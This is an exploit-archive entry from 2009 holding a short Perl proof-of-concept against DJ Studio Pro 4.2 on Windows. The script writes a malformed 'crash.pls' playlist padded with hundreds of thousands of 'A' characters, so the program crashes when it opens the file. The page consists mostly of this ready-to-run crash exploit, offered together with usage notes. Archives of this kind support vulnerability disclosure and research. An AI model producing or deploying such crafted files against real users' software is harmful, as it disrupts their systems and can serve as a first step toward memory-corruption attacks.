[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : DJ Studio Pro 4.2 (.PLS file) Local Crash Exploit
# Published : 2009-09-15
# Author : prodigy
# Previous Title : MP3 Collector 2.3 (m3u File) Local Crash PoC
# Next Title : httpdx Web Server 1.4 (Host Header) Remote Format String DoS Exploit


#!/usr/bin/perl -w
#
# DJ Studio Pro 4.2 (.PLS file) Crash Vulnerability Exploit
#
# Founded and exploited by prodigy
#
# Contact: smack_the_stream@hotmail.com
# 
# Vendor: http://www.e-soft.co.uk/
#
# Usage to reproduce the bug: when you created the malicious file, load the file and boooom!
#
# Platform: Windows
#
###################################################################

==PoC==

use strict;

use diagnostics;

my $file= "crash.pls";

my $boom= "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" x 5000;

open($FILE,">>$file");

print $FILE "$boom";

close($FILE);

print "File Created successfullyn";

==EndPoC==


##Greetz: Greetz myself for find the bug.

# www.Syue.com [2009-09-15]